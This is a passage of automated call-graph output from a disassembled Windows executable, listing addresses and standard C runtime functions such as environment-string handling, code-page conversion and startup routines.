7ff75aeb0c40 16435 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16429->16435 16430->16429 16436 7ff75aeaec08 _set_fmode 11 API calls 16430->16436 16431 7ff75aeb0b25 16434 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16431->16434 16432->16419 16433->16417 16433->16430 16434->16430 16435->16393 16437 7ff75aeb0bc8 16436->16437 16438 7ff75aeb0bd0 16437->16438 16439 7ff75aeb0bd9 16437->16439 16440 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16438->16440 16521 7ff75aeaa514 16439->16521 16442 7ff75aeb0bd7 16440->16442 16447 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16442->16447 16444 7ff75aeb0bf0 16605 7ff75aeb72b4 16444->16605 16445 7ff75aeb0c7b 16446 7ff75aeaa970 _isindst 17 API calls 16445->16446 16449 7ff75aeb0c8f 16446->16449 16447->16393 16451 7ff75aeb0cb8 16449->16451 16459 7ff75aeb0cc8 16449->16459 16455 7ff75aea4f78 _set_fmode 11 API calls 16451->16455 16452 7ff75aeb0c17 16454 7ff75aea4f78 _set_fmode 11 API calls 16452->16454 16453 7ff75aeb0c38 16456 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16453->16456 16457 7ff75aeb0c1c 16454->16457 16483 7ff75aeb0cbd 16455->16483 16456->16429 16458 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16457->16458 16458->16442 16460 7ff75aeb0fab 16459->16460 16461 7ff75aeb0cea 16459->16461 16462 7ff75aea4f78 _set_fmode 11 API calls 16460->16462 16463 7ff75aeb0d07 16461->16463 16624 7ff75aeb10dc 16461->16624 16464 7ff75aeb0fb0 16462->16464 16467 7ff75aeb0d7b 16463->16467 16469 7ff75aeb0d2f 16463->16469 16473 7ff75aeb0d6f 16463->16473 16466 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16464->16466 16466->16483 16471 7ff75aeb0da3 16467->16471 16474 7ff75aeaec08 _set_fmode 11 API calls 16467->16474 16488 7ff75aeb0d3e 16467->16488 16468 7ff75aeb0e2e 16482 7ff75aeb0e4b 16468->16482 16489 7ff75aeb0e9e 16468->16489 16639 7ff75aea976c 16469->16639 16471->16473 16476 7ff75aeaec08 _set_fmode 11 API calls 16471->16476 16471->16488 16473->16468 16473->16488 16645 7ff75aeb705c 16473->16645 16478 7ff75aeb0d95 16474->16478 16481 7ff75aeb0dc5 16476->16481 16477 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16477->16483 16484 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16478->16484 16479 7ff75aeb0d39 16485 7ff75aea4f78 _set_fmode 11 API calls 16479->16485 16480 7ff75aeb0d57 16480->16473 16491 7ff75aeb10dc 45 API calls 16480->16491 16486 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16481->16486 16487 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16482->16487 16484->16471 16485->16488 16486->16473 16490 7ff75aeb0e54 16487->16490 16488->16477 16489->16488 16492 7ff75aeb344c 40 API calls 16489->16492 16494 7ff75aeb344c 40 API calls 16490->16494 16498 7ff75aeb0e5a 16490->16498 16491->16473 16493 7ff75aeb0edc 16492->16493 16495 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16493->16495 16496 7ff75aeb0e86 16494->16496 16499 7ff75aeb0ee6 16495->16499 16500 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16496->16500 16497 7ff75aeb0f9f 16501 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16497->16501 16498->16497 16502 7ff75aeaec08 _set_fmode 11 API calls 16498->16502 16499->16488 16499->16498 16500->16498 16501->16483 16503 7ff75aeb0f2b 16502->16503 16504 7ff75aeb0f33 16503->16504 16505 7ff75aeb0f3c 16503->16505 16506 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16504->16506 16530 7ff75aeb04e4 16505->16530 16508 7ff75aeb0f3a 16506->16508 16513 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16508->16513 16510 7ff75aeb0f52 SetEnvironmentVariableW 16514 7ff75aeb0f76 16510->16514 16515 7ff75aeb0f97 16510->16515 16511 7ff75aeb0fdf 16512 7ff75aeaa970 _isindst 17 API calls 16511->16512 16517 7ff75aeb0ff3 16512->16517 16513->16483 16516 7ff75aea4f78 _set_fmode 11 API calls 16514->16516 16518 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16515->16518 16519 7ff75aeb0f7b 16516->16519 16518->16497 16520 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16519->16520 16520->16508 16522 7ff75aeaa521 16521->16522 16523 7ff75aeaa52b 16521->16523 16522->16523 16528 7ff75aeaa546 16522->16528 16524 7ff75aea4f78 _set_fmode 11 API calls 16523->16524 16525 7ff75aeaa532 16524->16525 16526 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16525->16526 16527 7ff75aeaa53e 16526->16527 16527->16444 16527->16445 16528->16527 16529 7ff75aea4f78 _set_fmode 11 API calls 16528->16529 16529->16525 16531 7ff75aeb04f1 16530->16531 16532 7ff75aeb04fb 16530->16532 16531->16532 16537 7ff75aeb0517 16531->16537 16533 7ff75aea4f78 _set_fmode 11 API calls 16532->16533 16534 7ff75aeb0503 16533->16534 16535 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16534->16535 16536 7ff75aeb050f 16535->16536 16536->16510 16536->16511 16537->16536 16538 7ff75aea4f78 _set_fmode 11 API calls 16537->16538 16538->16534 16540 7ff75aeb1029 16539->16540 16547 7ff75aeb1011 16539->16547 16541 7ff75aeaec08 _set_fmode 11 API calls 16540->16541 16542 7ff75aeb104d 16541->16542 16543 7ff75aeb10ae 16542->16543 16548 7ff75aeaec08 _set_fmode 11 API calls 16542->16548 16549 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16542->16549 16550 7ff75aeaa514 __std_exception_copy 37 API calls 16542->16550 16551 7ff75aeb10bd 16542->16551 16553 7ff75aeb10d2 16542->16553 16545 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16543->16545 16544 7ff75aeaa574 __CxxCallCatchBlock 45 API calls 16546 7ff75aeb10d8 16544->16546 16545->16547 16547->16398 16548->16542 16549->16542 16550->16542 16552 7ff75aeaa970 _isindst 17 API calls 16551->16552 16552->16553 16553->16544 16555 7ff75aea9740 16554->16555 16558 7ff75aea9749 16554->16558 16555->16558 16669 7ff75aea9208 16555->16669 16558->16412 16558->16413 16561 7ff75aeb62c4 16560->16561 16562 7ff75aeb71a9 16560->16562 16563 7ff75aeb62d1 16561->16563 16569 7ff75aeb6307 16561->16569 16564 7ff75aea4fbc 45 API calls 16562->16564 16566 7ff75aea4f78 _set_fmode 11 API calls 16563->16566 16577 7ff75aeb6278 16563->16577 16565 7ff75aeb71dd 16564->16565 16573 7ff75aeb71f3 16565->16573 16576 7ff75aeb71e2 16565->16576 16579 7ff75aeb720a 16565->16579 16570 7ff75aeb62db 16566->16570 16567 7ff75aeb6331 16568 7ff75aea4f78 _set_fmode 11 API calls 16567->16568 16572 7ff75aeb6336 16568->16572 16569->16567 16578 7ff75aeb6356 16569->16578 16571 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16570->16571 16574 7ff75aeb62e6 16571->16574 16575 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16572->16575 16580 7ff75aea4f78 _set_fmode 11 API calls 16573->16580 16574->16419 16589 7ff75aeb6341 16575->16589 16576->16419 16577->16419 16584 7ff75aea4fbc 45 API calls 16578->16584 16578->16589 16582 7ff75aeb7226 16579->16582 16583 7ff75aeb7214 16579->16583 16581 7ff75aeb71f8 16580->16581 16585 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16581->16585 16587 7ff75aeb7237 16582->16587 16588 7ff75aeb724e 16582->16588 16586 7ff75aea4f78 _set_fmode 11 API calls 16583->16586 16584->16589 16585->16576 16590 7ff75aeb7219 16586->16590 16923 7ff75aeb6314 16587->16923 16932 7ff75aeb8fbc 16588->16932 16589->16419 16593 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16590->16593 16593->16576 16595 7ff75aea4f78 _set_fmode 11 API calls 16595->16576 16597 7ff75aeb346e 16596->16597 16598 7ff75aeb348b 16596->16598 16597->16598 16600 7ff75aeb347c 16597->16600 16599 7ff75aeb3495 16598->16599 16972 7ff75aeb7ca8 16598->16972 16979 7ff75aeb7ce4 16599->16979 16602 7ff75aea4f78 _set_fmode 11 API calls 16600->16602 16604 7ff75aeb3481 memcpy_s 16602->16604 16604->16431 16606 7ff75aea4fbc 45 API calls 16605->16606 16607 7ff75aeb731a 16606->16607 16608 7ff75aeb7328 16607->16608 16991 7ff75aeaef94 16607->16991 16994 7ff75aea551c 16608->16994 16612 7ff75aeb7414 16615 7ff75aeb7425 16612->16615 16616 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16612->16616 16613 7ff75aea4fbc 45 API calls 16614 7ff75aeb7397 16613->16614 16618 7ff75aeaef94 5 API calls 16614->16618 16621 7ff75aeb73a0 16614->16621 16617 7ff75aeb0c13 16615->16617 16619 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16615->16619 16616->16615 16617->16452 16617->16453 16618->16621 16619->16617 16620 7ff75aea551c 14 API calls 16622 7ff75aeb73fb 16620->16622 16621->16620 16622->16612 16623 7ff75aeb7403 SetEnvironmentVariableW 16622->16623 16623->16612 16625 7ff75aeb10ff 16624->16625 16626 7ff75aeb111c 16624->16626 16625->16463 16627 7ff75aeaec08 _set_fmode 11 API calls 16626->16627 16628 7ff75aeb1140 16627->16628 16629 7ff75aeb11a1 16628->16629 16633 7ff75aeaec08 _set_fmode 11 API calls 16628->16633 16634 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16628->16634 16635 7ff75aeb04e4 37 API calls 16628->16635 16636 7ff75aeb11b0 16628->16636 16638 7ff75aeb11c4 16628->16638 16631 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16629->16631 16630 7ff75aeaa574 __CxxCallCatchBlock 45 API calls 16632 7ff75aeb11ca 16630->16632 16631->16625 16633->16628 16634->16628 16635->16628 16637 7ff75aeaa970 _isindst 17 API calls 16636->16637 16637->16638 16638->16630 16640 7ff75aea977c 16639->16640 16643 7ff75aea9785 16639->16643 16640->16643 17016 7ff75aea927c 16640->17016 16643->16479 16643->16480 16646 7ff75aeb7069 16645->16646 16649 7ff75aeb7096 16645->16649 16647 7ff75aeb706e 16646->16647 16646->16649 16648 7ff75aea4f78 _set_fmode 11 API calls 16647->16648 16651 7ff75aeb7073 16648->16651 16650 7ff75aeb70da 16649->16650 16653 7ff75aeb70f9 16649->16653 16667 7ff75aeb70ce __crtLCMapStringW 16649->16667 16652 7ff75aea4f78 _set_fmode 11 API calls 16650->16652 16654 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16651->16654 16658 7ff75aeb70df 16652->16658 16655 7ff75aeb7115 16653->16655 16656 7ff75aeb7103 16653->16656 16657 7ff75aeb707e 16654->16657 16660 7ff75aea4fbc 45 API calls 16655->16660 16659 7ff75aea4f78 _set_fmode 11 API calls 16656->16659 16657->16473 16661 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16658->16661 16662 7ff75aeb7108 16659->16662 16663 7ff75aeb7122 16660->16663 16661->16667 16664 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16662->16664 16663->16667 17063 7ff75aeb8b78 16663->17063 16664->16667 16667->16473 16668 7ff75aea4f78 _set_fmode 11 API calls 16668->16667 16670 7ff75aea9221 16669->16670 16671 7ff75aea921d 16669->16671 16692 7ff75aeb2660 16670->16692 16671->16558 16684 7ff75aea955c 16671->16684 16676 7ff75aea923f 16718 7ff75aea92ec 16676->16718 16677 7ff75aea9233 16678 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16677->16678 16678->16671 16681 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16682 7ff75aea9266 16681->16682 16683 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16682->16683 16683->16671 16685 7ff75aea9585 16684->16685 16688 7ff75aea959e 16684->16688 16685->16558 16686 7ff75aeb0858 WideCharToMultiByte 16686->16688 16687 7ff75aeaec08 _set_fmode 11 API calls 16687->16688 16688->16685 16688->16686 16688->16687 16689 7ff75aea962e 16688->16689 16691 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16688->16691 16690 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16689->16690 16690->16685 16691->16688 16693 7ff75aea9226 16692->16693 16694 7ff75aeb266d 16692->16694 16698 7ff75aeb299c GetEnvironmentStringsW 16693->16698 16737 7ff75aeab294 16694->16737 16699 7ff75aea922b 16698->16699 16700 7ff75aeb29cc 16698->16700 16699->16676 16699->16677 16701 7ff75aeb0858 WideCharToMultiByte 16700->16701 16702 7ff75aeb2a1d 16701->16702 16703 7ff75aeb2a24 FreeEnvironmentStringsW 16702->16703 16704 7ff75aead66c _fread_nolock 12 API calls 16702->16704 16703->16699 16705 7ff75aeb2a37 16704->16705 16706 7ff75aeb2a3f 16705->16706 16707 7ff75aeb2a48 16705->16707 16708 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16706->16708 16709 7ff75aeb0858 WideCharToMultiByte 16707->16709 16710 7ff75aeb2a46 16708->16710 16711 7ff75aeb2a6b 16709->16711 16710->16703 16712 7ff75aeb2a6f 16711->16712 16713 7ff75aeb2a79 16711->16713 16715 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16712->16715 16714 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16713->16714 16716 7ff75aeb2a77 FreeEnvironmentStringsW 16714->16716 16715->16716 16716->16699 16719 7ff75aea9311 16718->16719 16720 7ff75aeaec08 _set_fmode 11 API calls 16719->16720 16732 7ff75aea9347 16720->16732 16721 7ff75aea934f 16722 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16721->16722 16723 7ff75aea9247 16722->16723 16723->16681 16724 7ff75aea93c2 16725 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16724->16725 16725->16723 16726 7ff75aeaec08 _set_fmode 11 API calls 16726->16732 16727 7ff75aea93b1 16917 7ff75aea9518 16727->16917 16729 7ff75aeaa514 __std_exception_copy 37 API calls 16729->16732 16731 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16731->16721 16732->16721 16732->16724 16732->16726 16732->16727 16732->16729 16733 7ff75aea93e7 16732->16733 16734 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16732->16734 16735 7ff75aeaa970 _isindst 17 API calls 16733->16735 16734->16732 16736 7ff75aea93fa 16735->16736 16738 7ff75aeab2c0 FlsSetValue 16737->16738 16739 7ff75aeab2a5 FlsGetValue 16737->16739 16740 7ff75aeab2b2 16738->16740 16742 7ff75aeab2cd 16738->16742 16739->16740 16741 7ff75aeab2ba 16739->16741 16743 7ff75aeaa574 __CxxCallCatchBlock 45 API calls 16740->16743 16745 7ff75aeab2b8 16740->16745 16741->16738 16744 7ff75aeaec08 _set_fmode 11 API calls 16742->16744 16746 7ff75aeab335 16743->16746 16747 7ff75aeab2dc 16744->16747 16757 7ff75aeb2334 16745->16757 16748 7ff75aeab2fa FlsSetValue 16747->16748 16749 7ff75aeab2ea FlsSetValue 16747->16749 16751 7ff75aeab306 FlsSetValue 16748->16751 16752 7ff75aeab318 16748->16752 16750 7ff75aeab2f3 16749->16750 16753 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16750->16753 16751->16750 16754 7ff75aeaaf64 _set_fmode 11 API calls 16752->16754 16753->16740 16755 7ff75aeab320 16754->16755 16756 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16755->16756 16756->16745 16780 7ff75aeb25a4 16757->16780 16759 7ff75aeb2369 16795 7ff75aeb2034 16759->16795 16762 7ff75aead66c _fread_nolock 12 API calls 16763 7ff75aeb2397 16762->16763 16764 7ff75aeb239f 16763->16764 16766 7ff75aeb23ae 16763->16766 16765 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16764->16765 16777 7ff75aeb2386 16765->16777 16766->16766 16802 7ff75aeb26dc 16766->16802 16769 7ff75aeb24aa 16770 7ff75aea4f78 _set_fmode 11 API calls 16769->16770 16771 7ff75aeb24af 16770->16771 16774 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16771->16774 16772 7ff75aeb2505 16775 7ff75aeb256c 16772->16775 16813 7ff75aeb1e64 16772->16813 16773 7ff75aeb24c4 16773->16772 16778 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16773->16778 16774->16777 16776 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16775->16776 16776->16777 16777->16693 16778->16772 16781 7ff75aeb25c7 16780->16781 16782 7ff75aeb25d1 16781->16782 16828 7ff75aeb0348 EnterCriticalSection 16781->16828 16784 7ff75aeb2643 16782->16784 16786 7ff75aeaa574 __CxxCallCatchBlock 45 API calls 16782->16786 16784->16759 16789 7ff75aeb265b 16786->16789 16790 7ff75aeb26b2 16789->16790 16792 7ff75aeab294 50 API calls 16789->16792 16790->16759 16793 7ff75aeb269c 16792->16793 16794 7ff75aeb2334 65 API calls 16793->16794 16794->16790 16796 7ff75aea4fbc 45 API calls 16795->16796 16797 7ff75aeb2048 16796->16797 16798 7ff75aeb2066 16797->16798 16799 7ff75aeb2054 GetOEMCP 16797->16799 16800 7ff75aeb206b GetACP 16798->16800 16801 7ff75aeb207b 16798->16801 16799->16801 16800->16801 16801->16762 16801->16777 16803 7ff75aeb2034 47 API calls 16802->16803 16805 7ff75aeb2709 16803->16805 16804 7ff75aeb285f 16806 7ff75ae9c5c0 _log10_special 8 API calls 16804->16806 16805->16804 16807 7ff75aeb2746 IsValidCodePage 16805->16807 16809 7ff75aeb2760 memcpy_s 16805->16809 16808 7ff75aeb24a1 16806->16808 16807->16804 16810 7ff75aeb2757 16807->16810 16808->16769 16808->16773 16829 7ff75aeb214c 16809->16829 16810->16809 16811 7ff75aeb2786 GetCPInfo 16810->16811 16811->16804 16811->16809 16916 7ff75aeb0348 EnterCriticalSection 16813->16916 16830 7ff75aeb2189 GetCPInfo 16829->16830 16839 7ff75aeb227f 16829->16839 16836 7ff75aeb219c 16830->16836 16830->16839 16831 7ff75ae9c5c0 _log10_special 8 API calls 16832 7ff75aeb231e 16831->16832 16832->16804 16840 7ff75aeb2eb0 16836->16840 16839->16831 16841 7ff75aea4fbc 45 API calls 16840->16841 16842 7ff75aeb2ef2 16841->16842 16860 7ff75aeaf910 16842->16860 16861 7ff75aeaf919 MultiByteToWideChar 16860->16861 16918 7ff75aea93b9 16917->16918 16919 7ff75aea951d 16917->16919 16918->16731 16920 7ff75aea9546 16919->16920 16922 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16919->16922 16921 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16920->16921 16921->16918 16922->16919 16924 7ff75aeb6331 16923->16924 16925 7ff75aeb6348 16923->16925 16926 7ff75aea4f78 _set_fmode 11 API calls 16924->16926 16925->16924 16928 7ff75aeb6356 16925->16928 16927 7ff75aeb6336 16926->16927 16929 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16927->16929 16930 7ff75aea4fbc 45 API calls 16928->16930 16931 7ff75aeb6341 16928->16931 16929->16931 16930->16931 16931->16576 16933 7ff75aea4fbc 45 API calls 16932->16933 16934 7ff75aeb8fe1 16933->16934 16937 7ff75aeb8c38 16934->16937 16940 7ff75aeb8c86 16937->16940 16938 7ff75ae9c5c0 _log10_special 8 API calls 16939 7ff75aeb7275 16938->16939 16939->16576 16939->16595 16941 7ff75aeb8d0d 16940->16941 16943 7ff75aeb8cf8 GetCPInfo 16940->16943 16946 7ff75aeb8d11 16940->16946 16942 7ff75aeaf910 _fread_nolock MultiByteToWideChar 16941->16942 16941->16946 16944 7ff75aeb8da5 16942->16944 16943->16941 16943->16946 16945 7ff75aead66c _fread_nolock 12 API calls 16944->16945 16944->16946 16947 7ff75aeb8ddc 16944->16947 16945->16947 16946->16938 16947->16946 16948 7ff75aeaf910 _fread_nolock MultiByteToWideChar 16947->16948 16949 7ff75aeb8e4a 16948->16949 16950 7ff75aeb8f2c 16949->16950 16951 7ff75aeaf910 _fread_nolock MultiByteToWideChar 16949->16951 16950->16946 16952 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16950->16952 16953 7ff75aeb8e70 16951->16953 16952->16946 16953->16950 16954 7ff75aead66c _fread_nolock 12 API calls 16953->16954 16955 7ff75aeb8e9d 16953->16955 16954->16955 16955->16950 16956 7ff75aeaf910 _fread_nolock MultiByteToWideChar 16955->16956 16957 7ff75aeb8f14 16956->16957 16958 7ff75aeb8f34 16957->16958 16959 7ff75aeb8f1a 16957->16959 16966 7ff75aeaefd8 16958->16966 16959->16950 16961 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16959->16961 16961->16950 16963 7ff75aeb8f73 16963->16946 16965 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16963->16965 16964 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16964->16963 16965->16946 16967 7ff75aeaed80 __crtLCMapStringW 5 API calls 16966->16967 16968 7ff75aeaf016 16967->16968 16969 7ff75aeaf01e 16968->16969 16970 7ff75aeaf240 __crtLCMapStringW 5 API calls 16968->16970 16969->16963 16969->16964 16971 7ff75aeaf087 CompareStringW 16970->16971 16971->16969 16973 7ff75aeb7cb1 16972->16973 16974 7ff75aeb7cca HeapSize 16972->16974 16975 7ff75aea4f78 _set_fmode 11 API calls 16973->16975 16976 7ff75aeb7cb6 16975->16976 16977 7ff75aeaa950 _invalid_parameter_noinfo 37 API calls 16976->16977 16978 7ff75aeb7cc1 16977->16978 16978->16599 16980 7ff75aeb7d03 16979->16980 16981 7ff75aeb7cf9 16979->16981 16983 7ff75aeb7d08 16980->16983 16990 7ff75aeb7d0f _set_fmode 16980->16990 16982 7ff75aead66c _fread_nolock 12 API calls 16981->16982 16984 7ff75aeb7d01 16982->16984 16985 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16983->16985 16984->16604 16985->16984 16986 7ff75aeb7d42 HeapReAlloc 16986->16984 16986->16990 16987 7ff75aeb7d15 16988 7ff75aea4f78 _set_fmode 11 API calls 16987->16988 16988->16984 16989 7ff75aeb3600 _set_fmode 2 API calls 16989->16990 16990->16986 16990->16987 16990->16989 16992 7ff75aeaed80 __crtLCMapStringW 5 API calls 16991->16992 16993 7ff75aeaefb4 16992->16993 16993->16608 16995 7ff75aea5546 16994->16995 16996 7ff75aea556a 16994->16996 17000 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16995->17000 17002 7ff75aea5555 16995->17002 16997 7ff75aea556f 16996->16997 16998 7ff75aea55c4 16996->16998 17001 7ff75aea5584 16997->17001 16997->17002 17003 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16997->17003 16999 7ff75aeaf910 _fread_nolock MultiByteToWideChar 16998->16999 17007 7ff75aea55e0 16999->17007 17000->17002 17004 7ff75aead66c _fread_nolock 12 API calls 17001->17004 17002->16612 17002->16613 17003->17001 17004->17002 17005 7ff75aea55e7 GetLastError 17006 7ff75aea4eec _fread_nolock 11 API calls 17005->17006 17009 7ff75aea55f4 17006->17009 17007->17005 17010 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17007->17010 17014 7ff75aea5615 17007->17014 17015 7ff75aea5622 17007->17015 17008 7ff75aeaf910 _fread_nolock MultiByteToWideChar 17012 7ff75aea5666 17008->17012 17013 7ff75aea4f78 _set_fmode 11 API calls 17009->17013 17010->17014 17011 7ff75aead66c _fread_nolock 12 API calls 17011->17015 17012->17002 17012->17005 17013->17002 17014->17011 17015->17002 17015->17008 17017 7ff75aea9295 17016->17017 17024 7ff75aea9291 17016->17024 17037 7ff75aeb2aac GetEnvironmentStringsW 17017->17037 17020 7ff75aea92a2 17022 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17020->17022 17021 7ff75aea92ae 17044 7ff75aea93fc 17021->17044 17022->17024 17024->16643 17029 7ff75aea963c 17024->17029 17026 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17027 7ff75aea92d5 17026->17027 17028 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17027->17028 17028->17024 17030 7ff75aea965f 17029->17030 17035 7ff75aea9676 17029->17035 17030->16643 17031 7ff75aeaec08 _set_fmode 11 API calls 17031->17035 17032 7ff75aea96ea 17034 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17032->17034 17033 7ff75aeaf910 MultiByteToWideChar _fread_nolock 17033->17035 17034->17030 17035->17030 17035->17031 17035->17032 17035->17033 17036 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17035->17036 17036->17035 17038 7ff75aea929a 17037->17038 17040 7ff75aeb2ad0 17037->17040 17038->17020 17038->17021 17039 7ff75aead66c _fread_nolock 12 API calls 17041 7ff75aeb2b07 memcpy_s 17039->17041 17040->17039 17042 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17041->17042 17043 7ff75aeb2b27 FreeEnvironmentStringsW 17042->17043 17043->17038 17045 7ff75aea9424 17044->17045 17045->17045 17046 7ff75aeaec08 _set_fmode 11 API calls 17045->17046 17058 7ff75aea945f 17046->17058 17047 7ff75aea9467 17048 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17047->17048 17049 7ff75aea92b6 17048->17049 17049->17026 17050 7ff75aea94e1 17051 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17050->17051 17051->17049 17052 7ff75aeaec08 _set_fmode 11 API calls 17052->17058 17053 7ff75aea94d0 17055 7ff75aea9518 11 API calls 17053->17055 17054 7ff75aeb04e4 37 API calls 17054->17058 17056 7ff75aea94d8 17055->17056 17059 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17056->17059 17057 7ff75aea9504 17060 7ff75aeaa970 _isindst 17 API calls 17057->17060 17058->17047 17058->17050 17058->17052 17058->17053 17058->17054 17058->17057 17061 7ff75aeaa9b8 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17058->17061 17059->17047 17062 7ff75aea9516 17060->17062 17061->17058 17064 7ff75aeb8ba1 __crtLCMapStringW 17063->17064 17065 7ff75aeb715e 17064->17065 17066 7ff75aeaefd8 6 API calls 17064->17066 17065->16667 17065->16668 17066->17065 17067 7ff75ae9ccac 17088 7ff75ae9ce7c 17067->17088 17070 7ff75ae9cdf8 17242 7ff75ae9d19c IsProcessorFeaturePresent 17070->17242 17071 7ff75ae9ccc8 __scrt_acquire_startup_lock 17073 7ff75ae9ce02 17071->17073 17080 7ff75ae9cce6 __scrt_release_startup_lock 17071->17080 17074 7ff75ae9d19c 7 API calls 17073->17074 17076 7ff75ae9ce0d __CxxCallCatchBlock 17074->17076 17075 7ff75ae9cd0b 17077 7ff75ae9cd91 17094 7ff75ae9d2e4 17077->17094 17079 7ff75ae9cd96 17097 7ff75ae91000 17079->17097 17080->17075 17080->17077 17231 7ff75aea9b9c 17080->17231 17085 7ff75ae9cdb9 17085->17076 17238 7ff75ae9d000 17085->17238 17089 7ff75ae9ce84 17088->17089 17090 7ff75ae9ce90 __scrt_dllmain_crt_thread_attach 17089->17090 17091 7ff75ae9ccc0 17090->17091 17092 7ff75ae9ce9d 17090->17092 17091->17070 17091->17071 17092->17091 17249 7ff75ae9d8f8 17092->17249 17095 7ff75aeba540 memcpy_s 17094->17095 17096 7ff75ae9d2fb GetStartupInfoW 17095->17096 17096->17079 17098 7ff75ae91009 17097->17098 17276 7ff75aea54f4 17098->17276 17100 7ff75ae937fb 17283 7ff75ae936b0 17100->17283 17104 7ff75ae9c5c0 _log10_special 8 API calls 17106 7ff75ae93ca7 17104->17106 17236 7ff75ae9d328 GetModuleHandleW 17106->17236 17107 7ff75ae9391b 17459 7ff75ae945b0 17107->17459 17108 7ff75ae9383c 17450 7ff75ae91c80 17108->17450 17112 7ff75ae9385b 17355 7ff75ae98a20 17112->17355 17113 7ff75ae9396a 17482 7ff75ae92710 17113->17482 17117 7ff75ae9388e 17124 7ff75ae938bb __std_exception_destroy 17117->17124 17454 7ff75ae98b90 17117->17454 17118 7ff75ae9395d 17119 7ff75ae93962 17118->17119 17120 7ff75ae93984 17118->17120 17478 